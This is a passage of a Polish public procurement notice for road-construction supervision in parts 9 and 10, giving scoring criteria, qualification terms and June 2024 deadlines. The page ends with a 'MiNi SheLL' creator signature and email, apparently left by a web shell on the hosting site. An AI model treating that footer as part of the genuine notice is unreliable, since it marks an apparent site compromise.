maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.:Przebudowa odcinka drogi powiatowej nr 2010 S ul. 1 Maja w Panoszowie polegająca na wzmocnieniu nawierzchni bitumicznej bez zmiany konstrukcji”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego przy realizacji zadania pn.: „Modernizacja drogi powiatowej nr DP 2012 S </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR 1, ZADANIA NR 2, ZADANIA NR 3, ZADANIA 4, ZADANIA NR 5, ZADANIA NR 6, ZADANIA NR 7, ZADANIA NR 8, ZADANIA NR 9, ZADANIA NR 10<br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Waga (%)<br/>1) Cena (P1)	60 %<br/>2) Dyspozycyjność inspektora nadzoru inwestorskiego (P2)	40 %<br/>Razem (P)	100%<br/><br/>Oferty oceniane będą metodą punktową w skali 100-punktowej, tj. cena – 60 pkt., dyspozycyjność inspektora nadzoru inwestorskiego – 40 pkt.<br/><br/>Ad.1) Sposób obliczania punktów dla kryterium „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 60 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/> Wartość punktowa = --------------------------------------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto)<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60 pkt. Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium „2) Dyspozycyjność inspektora nadzoru inwestorskiego” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium, <br/>wynosi 40 pkt.<br/><br/>Waga – 40%<br/><br/>Obowiązkiem wykonawcy jest zapewnienie obecności inspektora nadzoru inwestorskiego na terenie budowy minimum 1 raz w tygodniu (z wyłączeniem sobót i dni ustawowo wolnych od pracy) przez nie mniej niż 2 godziny (w godzinach od 7:30 do 15:30). <br/><br/>Wykonawca może zwiększyć liczbę pobytów inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy za co otrzyma dodatkowe punkty.<br/><br/>Za każdy dodatkowo zaoferowany dzień pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia na terenie budowy, wykonawcy zostaną przyznane punkty w następujący sposób:<br/>a)	za 1 dodatkowy dzień pobytu (przez nie mniej niż 2 godziny) w ciągu tygodnia na terenie budowy <br/>– 20 pkt<br/>b)	za 2 dodatkowe dni pobytu (przez nie mniej niż 2 godziny dziennie) w ciągu tygodnia na terenie budowy – 40 pkt.<br/><br/>UWAGA! <br/>Kryterium „Dyspozycyjność inspektora nadzoru inwestorskiego”, będzie rozpatrywane na podstawie oświadczenia wykonawcy złożonego w pkt 3.1 Formularza ofertowego (załącznik nr 1 do SWZ).<br/>Brak wskazania w ofercie jakiegokolwiek dodatkowego dnia pobytu inspektora nadzoru inwestorskiego w ciągu tygodnia, wskazanie innego dodatkowego dnia pobytu inspektora nadzoru inwestorskiego <br/>w ciągu tygodnia na terenie budowy niż 1 lub 2 dodatkowe dni pobytu, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę tylko minimum wymaganego przez zamawiającego i w ramach tego kryterium wykonawca nie otrzyma dodatkowych punktów. <br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>P = P1 + P2<br/><br/>Wyniki obliczeń w punktach zostaną zaokrąglone do drugiego miejsca po przecinku. Suma punktów wg powyższych kryteriów będzie podstawą porównywania i oceny ofert, a następnie wyboru oferty najkorzystniejszej. Ze wszystkich ofert, które spełniają warunki wybrana zostanie oferta która w wyniku oceny dokonanej w oparciu o powyższe kryteria uzyska największą sumę punktów spośród badanych ofert. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taką samą łączną wartość punktową, zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność inspektora nadzoru inwestorskiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z postanowieniami SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z postanowieniami SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z postanowieniami SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Projektem umowy stanowiącym: <br/>Załącznik nr 13.1 – odpowiednio dla ZADANIA NR 1 do NR 9 <br/>Załącznik nr 13.2 – dla ZADANIA NR 10 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-07 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzlubliniec.e-zp.finn.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-07 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com